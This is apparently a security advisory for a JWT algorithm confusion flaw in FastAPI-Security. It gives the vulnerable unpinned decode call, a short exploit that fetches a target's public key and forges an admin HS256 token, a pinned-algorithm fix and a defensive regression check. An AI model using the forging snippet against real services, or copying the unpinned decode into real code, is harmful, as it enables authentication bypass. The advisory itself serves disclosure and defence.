JWT Algorithm Confusion in FastAPI-Security
FastAPI-Security v0.5.0–0.6.3
A vulnerability in JWT validation logic allows attackers to bypass signature verification by switching algorithm from RS256 to HS256.
Vulnerability Summary
CVE: CVE-2026-5580
CVSS: 7.5 (High)
CWE: CWE-327 (Use of Broken or Risky Cryptographic Algorithm)
FastAPI-Security versions 0.5.0 through 0.6.3 use the python-jose library for JWT validation without specifying a fixed algorithm. The library defaults to trusting the algorithm specified in the JWT header, enabling algorithm confusion attacks.
Technical Details
Root Cause
The vulnerable code in fastapi_security/jwt.py:
# VULNERABLE: algorithm not specified — trusts the token's header
payload = jose.jwt.decode(token, public_key)
Because algorithms is not specified, python-jose uses whatever alg is in the token header. An attacker who knows the RS256 public key (commonly served at /.well-known/jwks.json) can:
- Create a new JWT with "alg": "HS256" in the header
- Sign it using the RS256 public key as the HMAC-SHA256 secret
- The server decodes using HS256 with the public key → signature matches → authentication succeeds
Exploitation
import jwt
import requests

# Step 1: Get the public key
jwks = requests.get("https://api.target.com/.well-known/jwks.json").json()
# extract_pem is a JWK-to-PEM helper that is not defined in this snippet
public_key = extract_pem(jwks["keys"][0])

# Step 2: Forge token with HS256 + public key as secret
forged = jwt.encode(
    {"sub": "admin", "role": "administrator"},
    public_key,
    algorithm="HS256"
)
Impact
Any authenticated endpoint in a FastAPI application using fastapi-security 0.5.0–0.6.3 can be accessed by an unauthenticated attacker who can obtain or guess the application's public key.
Remediation
Update to FastAPI-Security 0.7.0 or later. If patching is not immediately possible:
# SAFE: explicitly specify algorithm
payload = jose.jwt.decode(token, public_key, algorithms=["RS256"])
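A regression check for the remediation above, as an added example that is not FastAPI-Security's or python-jose's code and uses only the standard library. It shows that the HMAC path accepts a token keyed with the public key, and that a header allowlist rejects the same token before any signature work. The names `gate`, `make_hs256_fixture`, `hmac_path_accepts` and the placeholder `PUBLIC_KEY_PEM` are assumptions made for illustration, and the gate does not itself verify RSA signatures.

```python
import base64, hashlib, hmac, json

# Constructed stand-in for the published RSA public key (not a real key).
PUBLIC_KEY_PEM = b"-----BEGIN PUBLIC KEY-----\nCONSTRUCTED+SAMPLE\n-----END PUBLIC KEY-----\n"
ALLOWED_ALGS = frozenset({"RS256"})  # assumption: the service only issues RS256

def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))

def make_hs256_fixture(claims: dict, secret: bytes) -> str:
    """Test fixture: the token shape the advisory describes (HS256 header)."""
    parts = ({"alg": "HS256", "typ": "JWT"}, claims)
    signing_input = ".".join(b64url(json.dumps(p).encode()) for p in parts)
    sig = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{b64url(sig)}"

def hmac_path_accepts(token: str, key: bytes) -> bool:
    """What a header-trusting verifier computes once the header selects HS256."""
    signing_input, _, sig = token.rpartition(".")
    expected = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return hmac.compare_digest(expected, b64url_decode(sig))

def gate(token: str) -> str:
    """Return the header alg if it is allowlisted; raise ValueError otherwise."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("not a compact JWS")
    try:
        header = json.loads(b64url_decode(parts[0]))
    except ValueError as exc:  # covers bad base64, bad UTF-8 and bad JSON
        raise ValueError("unreadable JWT header") from exc
    alg = header.get("alg") if isinstance(header, dict) else None
    # isinstance check keeps a non-string alg (e.g. a list) from raising TypeError
    if not isinstance(alg, str) or alg not in ALLOWED_ALGS:
        raise ValueError(f"algorithm {alg!r} not allowed")
    return alg
```

Run `gate(token)` ahead of `jose.jwt.decode(token, public_key, algorithms=["RS256"])`; it complements the pinned `algorithms` argument and does not replace it.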